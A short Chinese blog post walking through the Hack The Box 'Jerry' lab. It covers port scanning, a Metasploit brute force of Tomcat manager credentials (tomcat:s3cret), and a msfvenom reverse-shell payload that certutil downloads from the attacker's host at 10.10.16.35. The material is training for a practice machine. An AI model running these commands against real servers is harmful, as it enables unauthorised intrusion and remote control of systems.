[Day26] HTB Jerry

Scan

  • 扫 Port
    • rustscan -a 10.129.1.110 -r 1-65535
    • 发现有开8080

Brute Force

  • 尝试 msf 爆破
    • auxiliary/scanner/http/tomcat_mgr_login
    • 发现密码是 tomcat:s3cret
  • Wordlist
    • /usr/share/metasploit-framework/data/wordlists/tomcat_mgr_default_pass.txt
    • /usr/share/metasploit-framework/data/wordlists/tomcat_mgr_default_users.txt

进入 Manager APP

  • 发现不登入直接按 Manager App 就可以进後台ㄌ= =

Web shell

Reverse shell

  • 准备 Reverse shell
    • msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.16.35 LPORT=7877 -f exe > shell.exe
  • 下载 reverse shell
    • certutil -urlcache -f http://10.10.16.35/shell.exe shell8787.exe
  • 执行 Reverse shell
  • 取得 Flag

<<:  Day 26 长短期记忆网路 LSTM

>>:  PPT in Operating system

方法论(Know how):隐藏在程序书背後的系统逻辑与资讯汇整方法

把一件事情从现象上升到逻辑,再上升到方法,再到一整套方法体系,这个过程,就叫「方法论」。 不是每一个...

【苹果用户必看】5套超级好用的iTunes替代数据传输软件

想要将 iPhone 数据备份到计算机或传输到另一部 iPhone? 寻找一个好的 iPhone 备...

WordPress WPS Hide Login 外挂教学,隐藏登入网址,防止暴力登入攻击

这几天为提升 WordPress 站台安全性,安装了 WordPress 防火墙及防毒外挂 Word...

Day23 X WebAssembly

也许你早就听过 WebAssembly 这个词,传说中它可以让 C, C++, Rust 等系统语...

DAY 23:Facade Pattern,由统一的入口介面来做事

什麽是 Facade Pattern? 实作不依赖多个类别,而是依赖介面,并把这些类别实作在此介面 ...